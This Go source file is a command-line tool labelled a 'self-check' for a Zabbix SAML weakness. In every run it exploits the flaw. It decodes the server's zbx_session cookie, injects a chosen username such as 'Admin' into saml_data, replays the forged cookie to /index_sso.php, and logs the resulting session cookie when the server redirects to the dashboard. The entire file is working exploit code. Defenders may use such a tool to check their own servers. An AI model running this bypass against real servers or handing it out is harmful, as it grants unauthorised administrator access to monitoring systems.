package main
import (
"bytes"
"context"
"encoding/base64"
"encoding/json"
"github.com/kataras/golog"
"github.com/urfave/cli/v2"
"github.com/xiecat/xhttp"
"net/http"
"net/url"
"os"
)
// main wires up the command-line interface: a single "check" sub-command that
// takes a target URL and a username, builds a GET request for the target and
// hands it to exp. A positive result is logged through golog; the logged
// cookie is the Set-Cookie text returned by the target (see exp), so the log
// output contains session material. A CLI error aborts the process via
// golog.Fatal.
func main() {
	checkFlags := []cli.Flag{
		&cli.StringFlag{
			Name:     "target",
			Aliases:  []string{"t"},
			Usage:    "target for check",
			Required: true,
		},
		&cli.StringFlag{
			Name:     "username",
			Aliases:  []string{"u"},
			Usage:    "default username",
			Required: true,
		},
	}

	checkCmd := &cli.Command{
		Name:    "check",
		Aliases: []string{"c"},
		Usage:   "check multi assets",
		Flags:   checkFlags,
		Action: func(cc *cli.Context) error {
			target := cc.String("target")
			req, err := http.NewRequest(http.MethodGet, target, nil)
			if err != nil {
				return err
			}
			// The flag is marked Required, so this fallback only applies when
			// the caller passes an explicitly empty username.
			username := cc.String("username")
			if username == "" {
				username = "Admin"
			}
			vulnerable, cookie := exp(req, username)
			if vulnerable {
				golog.Infof("vul exist! target: %s, cookie: %s", target, cookie)
			}
			return nil
		},
	}

	app := &cli.App{
		Name:     "zabbix saml bypass self-check tool",
		Usage:    "developed by jweny(https://github.com/jweny)",
		Commands: []*cli.Command{checkCmd},
	}
	if err := app.Run(os.Args); err != nil {
		golog.Fatal(err)
	}
}
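// exp probes one Zabbix frontend for the SAML session-cookie weakness this
// tool self-checks. It sends req unchanged, requires the response body to
// contain "SAML" and the response to set a "zbx_session" cookie, rewrites that
// cookie's saml_data.username_attribute to defaultName and requests
// /index_sso.php on the same host with it. It returns (true, cookie.Raw) only
// when that second request answers 302 with Location
// "zabbix.php?action=dashboard.view".
//
// Every other outcome yields (false, ""). Transport, decoding and encoding
// failures are additionally logged at warning level so an operator can tell an
// inconclusive check (unreachable or unexpected target) from a target that is
// simply not affected; the (bool, string) contract is unchanged for callers.
//
// cookie.Raw is the Set-Cookie text as received from the server, not the
// rewritten value sent on the second request.
func exp(req *http.Request, defaultName string) (bool, string) {
	client, err := xhttp.NewDefaultClient(nil)
	if err != nil {
		golog.Warnf("check inconclusive, cannot create http client: %v", err)
		return false, ""
	}
	xReq := &xhttp.Request{RawRequest: req}
	// NOTE(review): no deadline is attached to ctx; confirm the default xhttp
	// client enforces its own timeout before running this against many hosts.
	ctx := context.Background()

	resp, err := client.Do(ctx, xReq)
	if err != nil {
		golog.Warnf("check inconclusive, request to %v failed: %v", req.URL, err)
		return false, ""
	}
	// A login page that does not mention SAML is not affected; no log needed.
	if !bytes.Contains(resp.Body, []byte("SAML")) {
		return false, ""
	}
	if resp.RawResponse == nil {
		golog.Warnf("check inconclusive, no raw response for %v", req.URL)
		return false, ""
	}
	cookie := findSessionCookie(resp.RawResponse.Cookies())
	if cookie == nil {
		return false, ""
	}

	// The session cookie is a URL-escaped, base64-encoded JSON object.
	session, err := url.PathUnescape(cookie.Value)
	if err != nil {
		golog.Warnf("check inconclusive, session cookie is not URL-escaped: %v", err)
		return false, ""
	}
	sessionBytes, err := base64.StdEncoding.DecodeString(session)
	if err != nil {
		golog.Warnf("check inconclusive, session cookie is not base64: %v", err)
		return false, ""
	}
	sign := make(map[string]interface{})
	if err := json.Unmarshal(sessionBytes, &sign); err != nil {
		golog.Warnf("check inconclusive, session cookie is not JSON: %v", err)
		return false, ""
	}
	sign["saml_data"] = map[string]string{
		"username_attribute": defaultName,
	}
	signBytes, err := json.Marshal(sign)
	if err != nil {
		golog.Warnf("check inconclusive, cannot re-encode session: %v", err)
		return false, ""
	}
	cookie.Value = url.PathEscape(base64.StdEncoding.EncodeToString(signBytes))

	// Second probe: same request object, rewritten cookie, SSO entry point.
	xReq.RawRequest.AddCookie(cookie)
	xReq.RawRequest.URL.Path = "/index_sso.php"
	resp, err = client.Do(ctx, xReq)
	if err != nil {
		golog.Warnf("check inconclusive, request to %v failed: %v", req.URL, err)
		return false, ""
	}
	redirectedToDashboard := resp.GetStatus() == http.StatusFound &&
		resp.GetHeaders().Get("Location") == "zabbix.php?action=dashboard.view"
	if redirectedToDashboard {
		return true, cookie.Raw
	}
	return false, ""
}

// findSessionCookie returns the first cookie named "zbx_session" in cookies,
// or nil when none is present.
func findSessionCookie(cookies []*http.Cookie) *http.Cookie {
	for _, ck := range cookies {
		if ck.Name == "zbx_session" {
			return ck
		}
	}
	return nil
}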